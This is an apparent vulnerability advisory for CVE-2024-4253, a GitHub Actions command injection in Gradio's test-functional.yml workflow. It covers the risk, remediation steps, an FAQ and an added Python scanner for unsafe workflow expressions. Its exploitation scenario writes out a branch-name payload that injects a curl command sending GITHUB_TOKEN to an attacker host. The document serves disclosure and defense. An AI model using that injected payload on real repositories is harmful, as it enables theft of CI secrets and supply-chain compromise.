CVE-2024-4253: Gradio: CI/CD command injection enables secrets exfiltration
CRITICAL PoC AVAILABLE
Gradio's GitHub Actions workflow contains a command injection flaw allowing any unauthenticated attacker to exfiltrate CI/CD secrets (GITHUB_TOKEN, COMMENT_TOKEN, CHROMATIC_PROJECT_TOKEN) by submitting a malicious pull request. Successful exploitation could enable supply chain compromise of published Gradio packages—affecting every downstream ML deployment that installs via pip. Patch immediately to a version past @gradio/video@0.6.12 and audit all GitHub Actions workflows for unsanitized use of GitHub context variables.
Risk Assessment
Critical risk. CVSS 9.1 with no authentication required, no user interaction, and network-accessible exploitation via any public PR submission. Gradio's dominance in ML prototyping, model demos, and Hugging Face Spaces means blast radius extends well beyond direct Gradio maintainers—a successful supply chain compromise cascades to thousands of downstream ML deployments. Attack complexity is trivial given well-documented GitHub Actions injection techniques and public PoC availability.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| gradio | pip | — | No patch |
Do you use gradio? You're affected.
Recommended Action
1. PATCH: Update @gradio/video past 0.6.12; verify patch commit a0e70366 is present in your installed version.
2. AUDIT: Review all GitHub Actions workflows for unsanitized use of `github.head_ref`, `github.event.pull_request.head.repo.full_name`, or other PR-controllable context variables passed directly into `run:` steps.
3. HARDEN: Expose GitHub context values only via environment variables (never inline in run commands); apply principle of least privilege to GITHUB_TOKEN with explicit `permissions:` blocks.
4. DETECT: Monitor CI runner logs for unexpected outbound connections; set up secret scanning alerts for token exposure.
5. DEPENDENCY HYGIENE: Enable Dependabot or similar for Gradio and review all ML framework dependencies for CI/CD workflow files that may be reused in your pipelines.
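An added example (not from the advisory or the Gradio project) for the AUDIT and HARDEN steps: a stdlib-only scanner that flags PR-controllable `${{ }}` expressions expanded inside `run:` steps. The two workflow snippets are constructed samples, and the `UNTRUSTED` list and the function names are assumptions of this example.

```python
import re

# PR-controllable contexts: the first two are named in the advisory, the third is added.
UNTRUSTED = ("github.head_ref",
             "github.event.pull_request.head.repo.full_name",
             "github.event.pull_request.title")
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")
EXPR = re.compile(r"\$\{\{(.*?)\}\}")

def run_lines(text):
    """Yield (line_no, shell_text) for each line of every run: step."""
    lines, i = text.splitlines(), 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        i += 1
        if not m:
            continue
        key_col, value = len(m.group(1)), m.group(2).strip()
        if value and value[0] not in "|>":
            yield i, value                      # single-line form
            continue
        while i < len(lines):                   # block scalar body
            body = lines[i]
            if body.strip() and len(body) - len(body.lstrip()) <= key_col:
                break
            i += 1
            if body.strip():
                yield i, body.strip()

def find_injections(text):
    """Return [(line_no, expression)] for untrusted context inlined in run:."""
    return [(n, e.strip()) for n, line in run_lines(text)
            for e in EXPR.findall(line) if any(u in e for u in UNTRUSTED)]

# Constructed samples (not the Gradio workflow): same step, inline vs. via env.
VULNERABLE = """\
steps:
  - run: |
      echo "repo: ${{ github.event.pull_request.head.repo.full_name }}"
      echo "branch: ${{ github.head_ref }}"
"""
HARDENED = """\
permissions:
  contents: read
steps:
  - env:
      HEAD_REF: ${{ github.head_ref }}
    run: echo "branch=$HEAD_REF"
"""
```

Expressions under `env:` are not flagged: the value reaches the shell as variable data, so it is never parsed as part of the command line.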
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2024-4253?
Gradio's GitHub Actions workflow contains a command injection flaw allowing any unauthenticated attacker to exfiltrate CI/CD secrets (GITHUB_TOKEN, COMMENT_TOKEN, CHROMATIC_PROJECT_TOKEN) by submitting a malicious pull request. Successful exploitation could enable supply chain compromise of published Gradio packages—affecting every downstream ML deployment that installs via pip. Patch immediately to a version past @gradio/video@0.6.12 and audit all GitHub Actions workflows for unsanitized use of GitHub context variables.
Is CVE-2024-4253 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-4253, increasing the risk of exploitation.
How to fix CVE-2024-4253?
1. PATCH: Update @gradio/video past 0.6.12; verify patch commit a0e70366 is present in your installed version.
2. AUDIT: Review all GitHub Actions workflows for unsanitized use of `github.head_ref`, `github.event.pull_request.head.repo.full_name`, or other PR-controllable context variables passed directly into `run:` steps.
3. HARDEN: Expose GitHub context values only via environment variables (never inline in run commands); apply principle of least privilege to GITHUB_TOKEN with explicit `permissions:` blocks.
4. DETECT: Monitor CI runner logs for unexpected outbound connections; set up secret scanning alerts for token exposure.
5. DEPENDENCY HYGIENE: Enable Dependabot or similar for Gradio and review all ML framework dependencies for CI/CD workflow files that may be reused in your pipelines.
What systems are affected by CVE-2024-4253?
This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, CI/CD pipelines for ML projects, agent frameworks, MLOps workflows.
What is the CVSS score for CVE-2024-4253?
CVE-2024-4253 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.90%.
Technical Details
NVD Description
A command injection vulnerability exists in the gradio-app/gradio repository, specifically within the 'test-functional.yml' workflow. The vulnerability arises due to improper neutralization of special elements used in a command, allowing for unauthorized modification of the base repository or secrets exfiltration. The issue affects versions up to and including '@gradio/video@0.6.12'. The flaw is present in the workflow's handling of GitHub context information, where it echoes the full name of the head repository, the head branch, and the workflow reference without adequate sanitization. This could potentially lead to the exfiltration of sensitive secrets such as 'GITHUB_TOKEN', 'COMMENT_TOKEN', and 'CHROMATIC_PROJECT_TOKEN'.
Exploitation Scenario
An adversary targeting ML infrastructure submits a pull request to a public Gradio-based repository. The PR's branch name contains injected shell metacharacters: `feature/; curl https://attacker.com/exfil?t=$GITHUB_TOKEN #`. The test-functional.yml workflow echoes the head repository name or branch unsanitized inside a `run:` step, executing the injected command in the CI runner context. The attacker receives the GITHUB_TOKEN out-of-band and uses it to push malicious commits to the main branch or tamper with a GitHub Release artifact. Downstream ML teams installing Gradio via `pip install gradio` receive the backdoored package, compromising model serving endpoints, Gradio-based agent UIs, and any system where the framework runs with access to model weights or sensitive inference infrastructure.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Related Vulnerabilities
| CVE | CVSS | Summary | Relation |
|---|---|---|---|
| CVE-2024-47167 | 9.8 | Gradio: unauthenticated SSRF in /queue/join, internal pivot | Same package: gradio |
| CVE-2024-39236 | 9.8 | Gradio: code injection via component metadata (CVSS 9.8) | Same package: gradio |
| CVE-2023-25823 | 9.8 | Gradio: hardcoded SSH key leaks via share=True demos | Same package: gradio |
| CVE-2024-0964 | 9.4 | Gradio: unauthenticated LFI exposes full server filesystem | Same package: gradio |
| CVE-2023-34239 | 9.1 | Gradio: path traversal + SSRF exposes model files & infra | Same package: gradio |